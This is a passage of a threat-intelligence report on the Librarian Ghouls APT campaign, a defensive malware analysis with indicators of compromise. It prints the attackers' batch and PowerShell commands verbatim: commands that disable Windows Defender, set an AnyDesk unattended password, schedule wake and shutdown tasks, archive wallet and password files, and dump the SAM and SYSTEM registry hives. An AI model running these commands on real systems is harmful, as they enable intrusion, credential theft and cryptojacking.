  1484. <li><code>blat.exe</code> is <a href="http://www.blat.net" target="_blank" rel="noopener">Blat</a>, a legitimate utility for sending email messages and files via SMTP. Attackers use this to send data they steal to an email server they control.</li>
  1485. <li><code>svchost.exe</code> is the remote access application AnyDesk. Attackers use this to remotely control the compromised machine.</li>
  1486. <li><code>dc.exe</code> is Defender Control, which allows disabling Windows Defender.</li>
  1487. </ul>
  1488. <p>After downloading the files, the script uses the specified password and the <code>driver.exe</code> console utility to extract <code>Trays.rar</code> into the same <code>C:\Intel</code> directory and run the unpacked <code>Trays.lnk</code>. This shortcut allows starting 4t Tray Minimizer minimized to the tray.</p>
  1489. <p>Next, the script installs AnyDesk on the compromised device and downloads a <code>bat.bat</code> file from the C2 server to <code>C:\Intel\AnyDesk</code>. Finally, <code>rezet.cmd</code> runs <code>bat.lnk</code>, which was previously extracted from <code>data.cab</code>.</p>
  1490. <h3 id="bat-bat">bat.bat</h3>
  1491. <p>Opening the <code>bat.lnk</code> shortcut runs the <code>bat.bat</code> batch file, which executes a series of malicious actions.</p>
  1492. <h4 id="disabling-security-measures-and-a-scheduled-task">Disabling security measures and a scheduled task</h4>
  1493. <p>First, the BAT file sets the password <code>QWERTY1234566</code> for AnyDesk, which allows the attackers to connect to the victim&#8217;s device without asking for confirmation.</p>
  1494. <p>Next, the script uses the previously downloaded Defender Control (<code>dc.exe</code>) application to disable Windows Defender.</p>
  1495. <p>To verify that the victim&#8217;s computer is on and available for remote connections, the batch file runs the <code>powercfg</code> utility six times with different parameters. This utility controls the local machine&#8217;s power settings.</p>
  1496. <p>Next, <code>bat.bat</code> runs the <code>schtasks</code> utility to create a <code>ShutdownAt5AM</code> scheduler task, which shuts down the victim&#8217;s PC every day at 5 AM as the name suggests. It is our assessment that the attackers use this technique to cover their tracks so that the user remains unaware that their device has been hijacked.</p><pre class="urvanov-syntax-highlighter-plain-tag">echo QWERTY1234566 | AnyDesk.exe --set-password _unattended_access
  1497. %SYSTEMDRIVE%\Intel\dc.exe /D
  1498. powercfg -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
  1499. powercfg -change -standby-timeout-ac 0
  1500. powercfg -change -hibernate-timeout-ac 0
  1501. powercfg -h off
  1502. powercfg /SETDCVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
  1503. powercfg /SETACVALUEINDEX SCHEME_CURRENT 238c9fa8-0aad-41ed-83f4-97be242c8f20 bd3b718a-0680-4d9d-8ab2-e1d2b4ac806d 1
  1504. schtasks /create /tn "ShutdownAt5AM" /tr "shutdown /s /f /t 0" /sc daily /st 05:00</pre><p>
  1505. <p align="center"><strong><em>Disabling security measures and the power management configuration in bat.bat</em></strong></p>
  1506. <h4 id="wakeup-script-and-data-theft">Wakeup script and data theft</h4>
  1507. <p>Next, the batch file executes the <code>wol.ps1</code> script via PowerShell.</p><pre class="urvanov-syntax-highlighter-plain-tag">$Action = New-ScheduledTaskAction -Execute "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
  1508. $Trigger = New-ScheduledTaskTrigger -Daily -At "01:00AM"
  1509. $Principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
  1510. # Creating task settings
  1511. $TaskSettings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -WakeToRun
  1512. # Registering task in Task Scheduler
  1513. Register-ScheduledTask -Action $Action -Principal $Principal -Trigger $Trigger -TaskName "WakeUpAndLaunchEdge" -Settings $TaskSettings -Force</pre><p>
  1514. <p align="center"><strong><em>Contents of the &#8220;wol.ps1&#8221; script</em></strong></p>
  1515. <p>This script launches Microsoft Edge every day at 1 AM. We found no evidence of <code>msedge.exe</code> being replaced or compromised, leading us to believe it is a genuine Microsoft Edge executable. This daily browser activation wakes the victim&#8217;s computer, giving attackers a four-hour window to establish unauthorized remote access with AnyDesk before the scheduled task shuts the machine down at 5 AM.</p>
  1516. <p>Following the execution of the PowerShell script, <code>bat.bat</code> removes the curl utility, the <code>Trays.rar</code> archive, and the AnyDesk installer. The attackers no longer need these components: at this stage of the infection, all necessary malicious files and third-party utilities have been downloaded with curl, <code>Trays.rar</code> has been unpacked, and AnyDesk has been installed on the device.</p>
  1517. <p>After that, the batch file sets environment variables for Blat. These variables contain, among other things, the email addresses where the victim&#8217;s data will be sent and the passwords for these accounts.</p>
  1518. <p>The next step is to collect information stored on the device that is of interest to the attackers:</p>
  1519. <ul>
  1520. <li>Cryptocurrency wallet credentials and seed phrases</li>
  1521. <li>Dumps of the <code>HKLM\SAM</code> and <code>HKLM\SYSTEM</code> registry keys made with <code>reg.exe</code></li>
  1522. </ul>
  1523. <pre class="urvanov-syntax-highlighter-plain-tag">%SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*парол*.* /y
  1524. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*карт*.* /y
  1525. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*кошельк*.* /y
  1526. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\wallet.dat /y
  1527. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.doc* /y
  1528. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*wallet*.txt /y
  1529. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*seed*.* /y
  1530. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\keystore.json /y
  1531. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*bitcoin*.* /y
  1532. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*usdt*.* /y
  1533. %SYSTEMDRIVE%\Intel\driver.exe a -r -[REDACTED] %SYSTEMDRIVE%\Intel\wallet.rar  C:\*ethereum*.* /y
  1534. reg save hklm\sam %SYSTEMDRIVE%\Intel\sam.backup
  1535. reg save hklm\system %SYSTEMDRIVE%\Intel\system.backup</pre>
  1536. <p align="center"><strong><em>Data collection by bat.bat</em></strong></p>
  1537. <p>The BAT file uses <code>driver.exe</code> to pack data it has collected into two separate password-protected archives. Then, the script runs <code>blat.exe</code> to send the victim&#8217;s data and AnyDesk configuration files to the attackers via SMTP.</p>
  1538. <h4 id="miner-installation-and-self-deletion">Miner installation and self-deletion</h4>
  1539. <p>Next, <code>bat.bat</code> deletes the files generated during the attack from the <code>C:\Intel\</code> folder and installs a crypto miner on the compromised system. To do this, the script creates a <code>bm.json</code> configuration file containing the mining pool address and the attackers&#8217; identifier, and then downloads <code>install.exe</code> from <code>hxxp://bmapps[.]org/bmcontrol/win64/Install.exe</code>.</p>
  1540. <p><code>install.exe</code> is an installer that checks for the JSON configuration file and the <code>bmcontrol.exe</code> process in the system. If the process is detected, the installer terminates it.</p>
  1541. <p>Then, <code>install.exe</code> downloads an archive with mining tools from <code>hxxps://bmapps[.]org/bmcontrol/win64/app-1.4.zip</code>.</p>
  1542. <p>The archive contains the following files:</p>
  1543. <ul>
  1544. <li><code>_install.exe</code>: a new version of the installer. While the samples in the attacks we analyzed were identical, we suspect the attackers have a scenario for updating the malware.</li>
  1545. <li><code>bmcontrol.exe</code>: miner controller</li>
  1546. <li><code>run.exe</code>, <code>stop.cmd</code>, <code>uninstall.cmd</code>: tools for starting, stopping, and removing the controller</li>
  1547. <li><a href="https://securelist.com/tag/xmrig/" target="_blank" rel="noopener">XMRig</a> miner</li>
  1548. </ul>
  1549. <p>Depending on the parameters of the JSON file, the unmodified original installer file is used, or <code>_install.exe</code> is renamed to <code>install.exe</code> and run. After that, the installer adds <code>run.exe</code> to autorun. This utility checks for an already running <code>bmcontrol.exe</code> controller on the compromised system, and if it doesn&#8217;t find one, runs it from the downloaded archive.</p>
  1550. <p>Once running, <code>bmcontrol.exe</code> creates two processes: <code>master</code> and <code>worker</code>. The <code>master</code> process launches and constantly monitors the <code>worker</code>, and also restarts it if the latter quits unexpectedly. In addition, the <code>master</code> passes the JSON configuration file to the <code>worker</code> process.</p>
  1551. <p>Before launching the XMRig miner, the <code>worker</code> process collects the following system information:</p>
  1552. <ol>
  1553. <li>Available CPU cores</li>
  1554. <li>Available RAM</li>
  1555. <li>GPU</li>
  1556. </ol>
  1557. <p>This data is used to configure the miner on the compromised device and also sent to the attackers&#8217; server. While XMRig is running, the <code>worker</code> maintains a connection to the mining pool, sending a request every 60 seconds.</p>
  1558. <p>After installing the miner on the system, <code>bat.bat</code> removes itself from the victim&#8217;s device.</p>
  1559. <h3 id="legitimate-software-utilized-by-the-attackers">Legitimate software utilized by the attackers</h3>
  1560. <p>It is a common technique to leverage third-party legitimate software for malicious purposes (<a href="https://attack.mitre.org/techniques/T1588/002/" target="_blank" rel="noopener">T1588.002</a>), which makes detecting and attributing APT activity more difficult. We have seen this pattern in current campaigns by various APT groups, in particular <a href="https://securelist.com/awaken-likho-apt-new-implant-campaign/114101/" target="_blank" rel="noopener">in the Likho cluster</a>.</p>
  1561. <p>Beyond the utilities discussed above, we also identified the following software in Librarian Ghouls attacks:</p>
  1562. <ul>
  1563. <li><a href="http://www.mipko.ru" target="_blank" rel="noopener">Mipko Personal Monitor</a>: a DLP system that the attackers use to monitor the victim. The application can collect screenshots and record keystrokes among other things.</li>
  1564. <li><a href="https://www.nirsoft.net/utils/web_browser_password.html" target="_blank" rel="noopener">WebBrowserPassView</a>: a password recovery utility that can extract passwords stored in web browsers. The attackers use this to steal victims&#8217; credentials.</li>
  1565. <li>ngrok: a global reverse proxy that secures and accelerates network services. Used by the attackers to connect to target machines.</li>
  1566. <li><a href="https://www.nirsoft.net/utils/nircmd.html" target="_blank" rel="noopener">NirCmd</a>: a legitimate utility that facilitates various OS tasks without a visible user interface. The attackers use this to covertly run scripts and executables.</li>
  1567. </ul>
  1568. <h3 id="phishing-campaign">Phishing campaign</h3>
  1569. <p>Our investigation revealed several domains that we assess with low confidence to be associated with the ongoing Librarian Ghouls campaign. At the time of the investigation, some of them remained active, including <code>users-mail[.]ru</code> and <code>deauthorization[.]online</code>. These domains hosted phishing pages, generated with PHP scripts and designed to harvest credentials for the <code>mail.ru</code> email service.</p>
  1570. <div id="attachment_116538" style="width: 1053px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116538" class="size-full wp-image-116538" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2.png" alt="Example of a phishing page associated with the APT campaign" width="1043" height="783" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2.png 1043w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-300x225.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-1024x769.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-768x577.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-200x150.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-466x350.png 466w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-740x556.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-373x280.png 373w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160112/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto2-800x601.png 800w" sizes="auto, (max-width: 1043px) 100vw, 1043px" /></a><p id="caption-attachment-116538" class="wp-caption-text">Example of a phishing page associated with the APT campaign</p></div>
  1571. <h2 id="infrastructure">Infrastructure</h2>
  1572. <p>The implant detailed in this article communicated with the command-and-control servers <code>downdown[.]ru</code> and <code>dragonfires[.]ru</code>. Both resolve to the IP address <a href="https://opentip.kaspersky.com/185.125.51.5/?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______d2af87f155401802&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">185.125.51[.]5</a>.</p>
  1573. <p>Our analysis of the attackers&#8217; infrastructure revealed a notable characteristic: several malicious web servers associated with this campaign had directory listing enabled, allowing us to inspect files they stored.</p>
  1574. <div id="attachment_116539" style="width: 418px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116539" class="size-full wp-image-116539" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3.png" alt="Directory listing on a malicious server" width="408" height="403" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3.png 408w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3-300x296.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3-354x350.png 354w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3-283x280.png 283w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/05/15160158/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto3-50x50.png 50w" sizes="auto, (max-width: 408px) 100vw, 408px" /></a><p id="caption-attachment-116539" class="wp-caption-text">Directory listing on a malicious server</p></div>
  1575. <h2 id="victims">Victims</h2>
  1576. <p>Our telemetry indicated that, during the investigation period, hundreds of Russian users fell victim to this campaign. It primarily focuses on industrial enterprises, with engineering schools also being a target of interest. Furthermore, the attacks described also impacted users in Belarus and Kazakhstan.</p>
  1577. <p>The phishing emails are notably composed in Russian and include archives with Russian filenames, along with Russian-language decoy documents. This suggests that the primary targets of this campaign are likely based in Russia or speak Russian.</p>
  1578. <h2 id="about-the-attackers">About the attackers</h2>
  1579. <p>Librarian Ghouls APT exhibits traits commonly associated with hacktivist groups, such as the use of self-extracting archives and a reliance on legitimate, third-party utilities rather than custom-built malware binary modules.</p>
  1580. <p>Since the beginning of the current campaign in December 2024, we have seen frequent updates to the implants, which vary in configuration files and the bundled sets of legitimate utilities. At the time of publishing this, our data encompassed over 100 malicious files connected to this campaign.</p>
  1581. <h2 id="takeaways">Takeaways</h2>
  1582. <p>At the time of this report&#8217;s release, the Librarian Ghouls APT campaign described in it is still active, as evidenced by attacks we observed in May 2025. Consistent with previous activity, the attackers leverage third-party legitimate utilities rather than developing custom tools. All of the malicious functionality still relies on installer, command, and PowerShell scripts. We observe that the attackers are continuously refining their tactics, encompassing not only data exfiltration but also the deployment of remote access tools and the use of phishing sites for email account compromise. We constantly monitor this threat actor and will continue to share up-to-date information about its activity.</p>
  1583. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1584. <p><em>* Additional indicators of compromise and a YARA rule for detecting Librarian Ghouls activity are available to customers of our </em><a href="https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting" target="_blank" rel="noopener"><em>APT Intelligence Reporting service</em></a><em>. Contact </em><a href="mailto:intelreports@kaspersky.com" target="_blank" rel="noopener"><em>intelreports@kaspersky.com</em></a><em> for more details.</em></p>
  1585. <h3 id="implants">Implants</h3>
  1586. <p><a href="https://opentip.kaspersky.com/d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______adf24abdb7a69cab&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">d8edd46220059541ff397f74bfd271336dda702c6b1869e8a081c71f595a9e68</a><br />
  1587. <a href="https://opentip.kaspersky.com/2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c31aa7ac989e7898&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2f3d67740bb7587ff70cc7319e9fe5c517c0e55345bf53e01b3019e415ff098b</a><br />
  1588. <a href="https://opentip.kaspersky.com/de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______53d7424a5af9e34a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">de998bd26ea326e610cc70654499cebfd594cc973438ac421e4c7e1f3b887617</a><br />
  1589. <a href="https://opentip.kaspersky.com/785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______95de702292e293b0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">785a5b92bb8c9dbf52cfda1b28f0ac7db8ead4ec3a37cfd6470605d945ade40e</a><br />
  1590. <a href="https://opentip.kaspersky.com/c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______df9f3be2b3c958a7&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c79413ef4088b3a39fe8c7d68d2639cc69f88b10429e59dd0b4177f6b2a92351</a><br />
  1591. <a href="https://opentip.kaspersky.com/53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______0f6d37fae23da320&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">53fd5984c4f6551b2c1059835ea9ca6d0342d886ba7034835db2a1dd3f8f5b04</a></p>
  1592. <h3 id="implant-configuration-files">Implant configuration files</h3>
  1593. <p><a href="https://opentip.kaspersky.com/f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______40f83574833163cc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">f8c80bbecbfb38f252943ee6beec98edc93cd734ec70ccd2565ab1c4db5f072f</a><br />
  1594. <a href="https://opentip.kaspersky.com/4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a2d0c4595d710055&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4d590a9640093bbda21597233b400b037278366660ba2c3128795bc85d35be72</a><br />
  1595. <a href="https://opentip.kaspersky.com/1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______93323bdd0967b039&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1b409644e86559e56add5a65552785750cd36d60745afde448cce7f6f3f09a06</a><br />
  1596. <a href="https://opentip.kaspersky.com/7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4e64991aeba8878c&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7c4a99382dbbd7b5aaa62af0ccff68aecdde2319560bbfdaf76132b0506ab68a</a><br />
  1597. <a href="https://opentip.kaspersky.com/702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______65ab69c4dd46117a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">702bf51811281aad78e6ca767586eba4b4c3a43743f8b8e56bb93bc349cb6090</a><br />
  1598. <a href="https://opentip.kaspersky.com/311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______68a80358dd3438d0&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">311ec9208f5fe3f22733fca1e6388ea9c0327be0836c955d2cf6a22317d4bdca</a></p>
  1599. <h3 id="malicious-archive-attachments">Malicious archive attachments</h3>
  1600. <p><a href="https://opentip.kaspersky.com/fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ca063e9ea0c7b79b&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fd58900ea22b38bad2ef3d1b8b74f5c7023b8ca8a5b69f88cfbfe28b2c585baf</a><br />
  1601. <a href="https://opentip.kaspersky.com/e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______dc894bdb5b36ae4e&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e6ea6ce923f2eee0cd56a0874e4a0ca467711b889553259a995df686bd35de86</a><br />
  1602. <a href="https://opentip.kaspersky.com/6954eaed33a9d0cf7e298778ec82d31bfbdf40c813c6ac837352ce676793db74/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ade297d6bf5d9bda&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6954eaed33a9d0cf7e298778ec82d31bfbdf40c813c6ac837352ce676793db74</a></p>
  1603. <h3 id="malicious-bat-files">Malicious BAT files</h3>
  1604. <p><a href="https://opentip.kaspersky.com/e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______316a5b901e841028&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">e880a1bb0e7d422b78a54b35b3f53e348ab27425f1c561db120c0411da5c1ce9</a><br />
  1605. <a href="https://opentip.kaspersky.com/c353a708edfd0f77a486af66e407f7b78583394d7b5f994cd8d2e6e263d25968/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______ef31a49d3ac426cc&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c353a708edfd0f77a486af66e407f7b78583394d7b5f994cd8d2e6e263d25968</a><br />
  1606. <a href="https://opentip.kaspersky.com/636d4f1e3dcf0332a815ce3f526a02df3c4ef2890a74521d05d6050917596748/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______c620910155370839&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">636d4f1e3dcf0332a815ce3f526a02df3c4ef2890a74521d05d6050917596748</a><br />
  1607. <a href="https://opentip.kaspersky.com/c5eeec72b5e6d0e84ff91dfdcbefbbbf441878780f887febb0caf3cbe882ec72/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b8f025269bbfe5c3&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">c5eeec72b5e6d0e84ff91dfdcbefbbbf441878780f887febb0caf3cbe882ec72</a><br />
  1608. <a href="https://opentip.kaspersky.com/8bdb8df5677a11348f5787ece3c7c94824b83ab3f31f40e361e600576909b073/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b5baf6d6204e4386&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8bdb8df5677a11348f5787ece3c7c94824b83ab3f31f40e361e600576909b073</a><br />
  1609. <a href="https://opentip.kaspersky.com/2af2841bf925ed1875faadcbb0ef316c641e1dcdb61d1fbf80c3443c2fc9454f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1c891646239b988f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">2af2841bf925ed1875faadcbb0ef316c641e1dcdb61d1fbf80c3443c2fc9454f</a></p>
  1610. <h3 id="decoy-documents">Decoy documents</h3>
  1611. <p>cab1c4c675f1d996b659bab1ddb38af365190e450dec3d195461e4e4ccf1c286<br />
  1612. dfac7cd8d041a53405cc37a44f100f6f862ed2d930e251f4bf22f10235db4bb3<br />
  1613. 977054802de7b583a38e0524feefa7356c47c53dd49de8c3d533e7689095f9ac<br />
  1614. 65f7c3e16598a8cb279b86eaeda32cb7a685801ed07d36c66ff83742d41cd415<br />
  1615. a6ff418f0db461536cff41e9c7e5dba3ee3b405541519820db8a52b6d818a01e<br />
  1616. 6c86608893463968bfda0969aa1e6401411c0882662f3e70c1ac195ee7bd1510</p>
  1617. <h3 id="malicious-ps1-scripts">Malicious PS1 scripts</h3>
  1618. <p><a href="https://opentip.kaspersky.com/8b6afbf73a9b98eec01d8510815a044cd036743b64fef955385cbca80ae94f15/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______f0757553ed28437a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">8b6afbf73a9b98eec01d8510815a044cd036743b64fef955385cbca80ae94f15</a><br />
  1619. <a href="https://opentip.kaspersky.com/7d6b598eaf19ea8a571b4bd79fd6ff7928388b565d7814b809d2f7fdedc23a0a/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______6232edafc0059ec1&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">7d6b598eaf19ea8a571b4bd79fd6ff7928388b565d7814b809d2f7fdedc23a0a</a><br />
  1620. <a href="https://opentip.kaspersky.com/01793e6f0d5241b33f07a3f9ad34e40e056a514c5d23e14dc491cee60076dc5a/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______b27707e00ab0dcb6&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">01793e6f0d5241b33f07a3f9ad34e40e056a514c5d23e14dc491cee60076dc5a</a></p>
  1621. <p><strong>Miner installer (install.exe)</strong><br />
  1622. <a href="https://opentip.kaspersky.com/649ee35ad29945e8dd6511192483dddfdfe516a1312de5e0bd17fdd0a258c27f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______174435c19f87054a&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">649ee35ad29945e8dd6511192483dddfdfe516a1312de5e0bd17fdd0a258c27f</a></p>
  1623. <p><strong>Miner controller (bmcontrol.exe)</strong><br />
  1624. <a href="https://opentip.kaspersky.com/9cce3eaae0be9b196017cb6daf49dd56146016f936b66527320f754f179c615f/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______5e709c53f2a3db3f&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9cce3eaae0be9b196017cb6daf49dd56146016f936b66527320f754f179c615f</a></p>
  1625. <p><strong>Miner launcher (run.exe)</strong><br />
  1626. <a href="https://opentip.kaspersky.com/d7bcab5acc8428026e1afd694fb179c5cbb74c5be651cd74e996c2914fb2b839/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______9dd68fb3baf6c4b4&amp;utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">d7bcab5acc8428026e1afd694fb179c5cbb74c5be651cd74e996c2914fb2b839</a></p>
